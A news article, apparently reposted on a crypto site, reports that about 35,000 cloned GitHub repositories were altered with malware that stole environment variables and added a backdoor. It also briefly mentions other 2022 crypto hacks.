September 24, 2022

Developer platform Github has been inundated with malware that has infiltrated tens of thousands of repositories.

Up to 35,000 Github repositories have been cloned with malware according to a security researcher.

The widespread malware attack did not specifically target crypto repositories (repos), but they were among those affected.

Software engineer Stephen Lacy notified the crypto community of the hack on August 3.

Clone Github repositories

Bleeping Computer Tech Portal mentionted that the repos were not hacked, but copied with their clones altered to include the malware. Cloning open source code is a common practice among developers, however, attackers have inserted malicious code and links into legitimate projects to target unsuspecting developers.

Several projects from crypto, Golang, Python, JavaScript, Bash, Docker and Kubernetes have been affected by the attack, the researcher noted.

While reviewing a project he had found from a Google search, the engineer noticed a malicious URL in the code. A Github repositories scan for this URL returned more than 35,000 results.

Bleeping Computer said more than 13,000 search results came from a single repository called “redhat-operator-ecosystem.” The malicious URL “infiltrated a user’s environment variables, but additionally contained a one-line backdoor,” the report added.

These environment variables can contain sensitive data such as API keys, tokens, Amazon AWS credentials, and encryption keys. The malware also allows remote attackers to execute arbitrary code on the systems of anyone who installs and runs the clones.

The majority of the cloned repos had surfaced last month, the report said.

Github confirmed that the original repositories had not been compromised and had cleaned or quarantined the clones.

Last month, BeInCrypto reported that a new strain of malware written in Rust was making the rounds. Luca Stealer targets Windows operating systems and steals sensitive information such as crypto wallet information. The malware was also distributed on Github.

Bad week in crypto

DeFi researcher Miles Deutscher pointed out that it hasn’t been a great week in crypto. Earlier this week, the Nomad bridge was hacked for $190 million and a few hours after that, around 8,000 Solana wallets were hacked resulting in the theft of around $8 million.

Markets appear to remain unaffected as total market capitalization has gained 1.7% on the day to reach $1.12 trillion at the time of writing.

Denial of responsibility

All information contained on our website is published in good faith and for general information purposes only. Any action the reader takes on the information found on our website is strictly at their own risk.

Source link

Leave a Reply

Your email address will not be published.